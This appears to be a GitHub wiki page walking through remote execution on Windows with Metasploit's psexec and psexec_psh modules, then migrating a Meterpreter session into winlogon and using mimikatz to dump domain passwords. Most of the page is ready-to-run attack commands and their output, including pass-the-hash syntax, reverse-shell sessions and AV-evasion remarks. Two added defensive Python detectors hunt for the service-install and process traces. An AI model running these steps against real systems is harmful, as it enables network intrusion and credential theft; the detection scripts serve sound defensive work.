PSEXEC - TopazA/mimikatz GitHub Wiki

How to - Remote Execution Using Metasploit's PSEXEC Modules and Meterpreter...

Using Metasploit's PSEXEC/PSEXEC_PSH modules works great both when trying to 'pass the hash' of a local admin account and when using credentials that have administrative access on the target.

To pass the hash, the format is:

msf exploit(psexec_psh) > set SMBPASS LM:NTLM

Where LM:NTLM is the LM hash and the NTLM hash, separated by a ':'.

Using Metasploit PSEXEC_PSH (PowerShell)

  • PROS: Evades AV like a boss
  • CONS: May take several exploit attempts to execute successfully
  • CONS: Won't work on older machines that don't have PowerShell installed
  • CONS: May leave multiple PowerShell processes running even if they don't all connect back (kill them before disconnecting)

root@Kali:~# msfconsole

msf > use exploit/windows/smb/psexec_psh

msf exploit(psexec_psh) > set RHOST 10.0.13.2

RHOST => 10.0.13.2

msf exploit(psexec_psh) > set SMBPASS P@ssw0rddddd!

SMBPASS => P@ssw0rddddd!

msf exploit(psexec_psh) > set SMBDomain company.domain

SMBDomain => company.domain

msf exploit(psexec_psh) > set SMBUSER admin

SMBUSER => admin

msf exploit(psexec_psh) > exploit

[*] Started reverse handler on 10.0.13.37:4444 
[*] 10.0.13.2:445 - Executing the payload...
[+] 10.0.13.2:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (882688 bytes) to 10.0.13.2
[*] Meterpreter session 1 opened (10.0.13.37:4444 -> 10.0.13.2:58202) at 2015-06-23 07:43:56 -0400

meterpreter >


Using Metasploit PSEXEC

  • PROS: Executes remotely as expected
  • CONS: AV picks up the service fairly consistently; not very stealthy

root@Kali:~# msfconsole

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set RHOST 10.0.13.2

RHOST => 10.0.13.2

msf exploit(psexec) > set SMBPASS P@ssw0rddddd!

SMBPASS => P@ssw0rddddd!

msf exploit(psexec) > set SMBDomain company.domain

SMBDomain => company.domain

msf exploit(psexec) > set SMBUSER admin

SMBUSER => admin

msf exploit(psexec) > exploit

[*] Started reverse handler on 10.0.13.37:4444 
[*] Connecting to the server...
[*] Authenticating to 10.0.13.2:445|looptech as user 'taral'...
[*] Uploading payload...
[*] Created \MqsYjmoq.exe...
[+] 10.0.13.2:445 - Service started successfully...
[*] Deleting \MqsYjmoq.exe...
[*] Sending stage (882688 bytes) to 10.0.13.2
[*] Meterpreter session 2 opened (10.0.13.37:4444 -> 10.0.13.2:58206) at 2015-06-23 07:47:46 -0400

meterpreter >
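Both transcripts above leave the same kind of trace on the target: a new service whose binary is either a randomly named executable uploaded to the ADMIN$ share (the PSEXEC run shows "Created \MqsYjmoq.exe", deleted again moments later) or, for PSEXEC_PSH, a PowerShell one-liner. The file is gone before anyone looks, but the service install itself is logged in the Windows System log as Event ID 7045. The following detector is an added example written here for defenders; it is not code from this wiki, from mimikatz or from Metasploit. It assumes a simplified dict layout for an exported 7045 record (constructed, not a real export format), that the PSEXEC upload lands as an 8-letter .exe directly in the Windows root, and that the PSEXEC_PSH service binary is a hidden, encoded PowerShell command line (assumed from how the module is described, so treat the markers as a starting list to tune).

```python
import re
from typing import Dict, List, Tuple

# Constructed sample records modelled on Windows System log Event ID 7045
# ("A service was installed in the system"). The dict layout is a deliberate
# simplification for this example, not a real log export format.
# Records 0 and 1 mimic the two module runs on this page; 2 and 3 are benign.
SAMPLE_7045: List[Dict[str, str]] = [
    {"host": "WIN-7", "service_name": "MqsYjmoq",
     "image_path": r"C:\Windows\MqsYjmoq.exe",
     "account": r"COMPANY.DOMAIN\admin"},
    {"host": "WIN-7", "service_name": "yKzQbDfw",   # constructed random name
     "image_path": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e SQBFAFgAIAAo...",
     "account": r"COMPANY.DOMAIN\admin"},
    {"host": "WIN-7", "service_name": "Sysmon64",
     "image_path": r"C:\Windows\Sysmon64.exe",
     "account": r"NT AUTHORITY\SYSTEM"},
    {"host": "WIN-7", "service_name": "VendorAgent",
     "image_path": r"C:\Program Files\Vendor\Agent\agent.exe --service",
     "account": r"NT AUTHORITY\SYSTEM"},
]

# Command-line fragments typical of a hidden, encoded PowerShell launcher.
PSH_MARKERS = ("-nop", "-w hidden", "-windowstyle hidden",
               "-e ", "-enc", "-encodedcommand")

# <drive>:\Windows\<8 letters>.exe or \\host\ADMIN$\<8 letters>.exe
RANDOM_EXE_IN_ROOT = re.compile(
    r"(?i)(?:[a-z]:\\windows|\\\\[^\\]+\\admin\$)\\([a-z]{8})\.exe")


def random_name_in_windows_root(image_path: str) -> bool:
    """True when the service binary is an 8-letter .exe sitting directly in
    the Windows root (where an ADMIN$ upload lands)."""
    return RANDOM_EXE_IN_ROOT.fullmatch(image_path.strip('"')) is not None


def looks_like_hidden_powershell(image_path: str) -> bool:
    """True when the service binary is a PowerShell command line carrying
    hide/encode switches instead of a path to an installed executable."""
    low = image_path.lower()
    return "powershell" in low and any(m in low for m in PSH_MARKERS)


def classify_service_install(event: Dict[str, str]) -> List[str]:
    """Return the reasons (possibly none) a 7045 record is suspicious."""
    reasons: List[str] = []
    image = event.get("image_path", "")
    if random_name_in_windows_root(image):
        reasons.append("service binary is a random 8-letter exe in the Windows root "
                       "(psexec-style ADMIN$ upload)")
    if looks_like_hidden_powershell(image):
        reasons.append("service binary is a hidden/encoded PowerShell one-liner "
                       "(psexec_psh-style launcher)")
    return reasons


def find_suspicious(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Filter a batch of 7045 records down to the ones worth an analyst's time."""
    hits = []
    for ev in events:
        reasons = classify_service_install(ev)
        if reasons:
            hits.append((ev["service_name"], reasons))
    return hits


if __name__ == "__main__":
    for name, why in find_suspicious(SAMPLE_7045):
        print(f"[!] service {name!r}: " + "; ".join(why))
```

Both rules are coarse on purpose: an 8-letter executable in C:\Windows is rare for a legitimate service but not impossible, so baseline the rule against your own fleet before alerting on it, and correlate a hit with the network logon (Event 4624, logon type 3) from the same source address and the short-lived file on ADMIN$ if you have file auditing. Note also that the PSEXEC_PSH "CONS" above (stray PowerShell processes left behind) means a host can still be carrying the payload after the session is closed, so the service event is the start of the hunt, not the end.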


Now that we are in meterpreter:

  1. We need to migrate into a suitable process so that mimikatz loads successfully.
  2. So, list the running processes and find a suitable SYSTEM process running as x86_64.

meterpreter > ps

Process List
============

 PID   PPID  Name                 Arch    Session     User                          Path
 ---   ----  ----                 ----    -------     ----                          ----
 0     0     [System Process]             4294967295                                
 4     0     System               x86_64  0                                         
 300   4     smss.exe             x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 312   536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 388   380   csrss.exe            x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 396   876   dwm.exe              x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\dwm.exe
 432   380   wininit.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 440   424   csrss.exe            x86_64  1           NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 496   424   winlogon.exe         x86_64  1           NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 536   432   services.exe         x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 544   432   lsass.exe            x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 556   432   lsm.exe              x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 652   536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 736   536   svchost.exe          x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 832   536   svchost.exe          x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 876   536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 892   440   conhost.exe          x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\conhost.exe
 900   536   svchost.exe          x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 924   536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1088  536   svchost.exe          x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1188  536   spoolsv.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1216  536   svchost.exe          x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1296  536   svchost.exe          x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1376  536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1596  536   svchost.exe          x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1632  536   svchost.exe          x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1692  440   conhost.exe          x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\conhost.exe
 1868  592   explorer.exe         x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\explorer.exe
 2116  536   dllhost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 2252  536   msdtc.exe            x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 2280  536   svchost.exe          x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2504  536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2628  536   SearchIndexer.exe    x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2908  536   taskhost.exe         x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\taskhost.exe
 3324  1876  rundll32.exe         x86     0           NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\rundll32.exe
 3572  1868  mmc.exe              x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\mmc.exe
 3800  1868  cmd.exe              x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\cmd.exe

meterpreter > migrate 496 //Migrate into winlogon.exe

[*] Migrating from 3324 to 496...

[*] Migration completed successfully.

meterpreter > getsystem //Ensure you have system permissions...

...got system (via technique 1).

meterpreter > load mimikatz //Load the mimikatz extension on the target system

Loading extension mimikatz...success.

meterpreter > mimikatz_command -f sekurlsa::searchPasswords //You can now run whatever mimikatz commands you'd like!

[0] { WIN-7$ ; COMPANY.DOMAIN ; 0d503978f393a94e05c2e0de8274936214c0d310afd9a202464e2f }

[1] { WIN-7$ ; COMPANY.DOMAIN ; 0d503978f393a94e05c2e0de8274936214c0d310afd9a202464e2f }

[2] { admin ; COMPANY.DOMAIN ; P@ssw0rddddd! }

[3] { admin ; COMPANY.DOMAIN ; P@ssw0rddddd! }
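Read from the defender's side, the process listing earlier on this page is the giveaway: the payload is living in PID 3324, a 32-bit rundll32.exe launched from SysWOW64, running as NT AUTHORITY\SYSTEM in session 0, whose parent (PID 1876) no longer exists because the service executable exited right after spawning it. The following hunting script is an added example written for this page; it is not code from this wiki, from mimikatz or from Metasploit. It parses an excerpt of that same meterpreter-style listing (plus one constructed benign 32-bit user process, PID 4120, added to show the rule stays quiet on ordinary WoW64 programs) and flags processes that combine two weak signals: a 32-bit SYSTEM process in session 0 on a 64-bit host, and a missing parent that is not part of the normal Windows boot chain. The column layout and the list of boot-chain processes whose parents legitimately die are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Excerpt of the `ps` listing shown on this page, plus one CONSTRUCTED benign
# 32-bit user process (PID 4120) that the rule must not flag.
PS_OUTPUT = r"""
 PID   PPID  Name                 Arch    Session     User                          Path
 ---   ----  ----                 ----    -------     ----                          ----
 0     0     [System Process]             4294967295
 4     0     System               x86_64  0
 300   4     smss.exe             x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 388   380   csrss.exe            x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 432   380   wininit.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 496   424   winlogon.exe         x86_64  1           NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 536   432   services.exe         x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 544   432   lsass.exe            x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 652   536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1868  592   explorer.exe         x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\explorer.exe
 3324  1876  rundll32.exe         x86     0           NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\rundll32.exe
 3800  1868  cmd.exe              x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\cmd.exe
 4120  1868  notepad.exe          x86     1           COMPANY.DOMAIN\admin          C:\Windows\SysWOW64\notepad.exe
"""

# Columns are separated by two or more spaces; Arch, User and Path may be absent.
ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>.+?)\s{2,}"
    r"(?:(?P<arch>x86_64|x86)\s+)?(?P<session>\d+)"
    r"(?:\s{2,}(?P<user>.+?))?(?:\s{2,}(?P<path>\S+))?\s*$")

SYSTEM_USER = r"NT AUTHORITY\SYSTEM"

# Processes whose parent normally exits during boot/logon (assumed baseline):
# smss spawns csrss/wininit/winlogon then exits; userinit spawns explorer and exits.
BOOT_CHAIN_ORPHANS = {"[System Process]", "System", "smss.exe", "csrss.exe",
                      "wininit.exe", "winlogon.exe", "explorer.exe"}


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    arch: Optional[str]
    session: int
    user: Optional[str]
    path: Optional[str]


def parse_ps(text: str) -> List[Proc]:
    """Parse a meterpreter-style process table; header and separator rows are skipped."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        procs.append(Proc(int(m["pid"]), int(m["ppid"]), m["name"], m["arch"],
                          int(m["session"]), m["user"], m["path"]))
    return procs


def flag_suspicious(procs: List[Proc]) -> Dict[int, List[str]]:
    """Map PID -> reasons for every process that trips at least one rule."""
    live_pids = {p.pid for p in procs}
    flagged: Dict[int, List[str]] = {}
    for p in procs:
        reasons = []
        if p.arch == "x86" and p.user == SYSTEM_USER and p.session == 0:
            reasons.append("32-bit process running as SYSTEM in session 0 on a 64-bit host"
                           + (" (hosted from SysWOW64)" if "syswow64" in (p.path or "").lower() else ""))
        if p.ppid not in live_pids and p.name not in BOOT_CHAIN_ORPHANS:
            reasons.append(f"parent PID {p.ppid} no longer exists and the process is not "
                           "part of the normal boot chain")
        if reasons:
            flagged[p.pid] = reasons
    return flagged


if __name__ == "__main__":
    for pid, why in flag_suspicious(parse_ps(PS_OUTPUT)).items():
        print(f"[!] PID {pid}: " + "; ".join(why))
```

On this listing only PID 3324 trips both rules; csrss, wininit, winlogon and explorer all have dead parents too, which is why the orphan rule alone is too noisy to alert on. Some legitimate 32-bit services do run as SYSTEM, so treat a single reason as context and two or more as worth a look, and remember that once the operator has migrated into winlogon.exe (as the page does next) the original rundll32 process is gone and the evidence moves to the service-install and credential-access events instead.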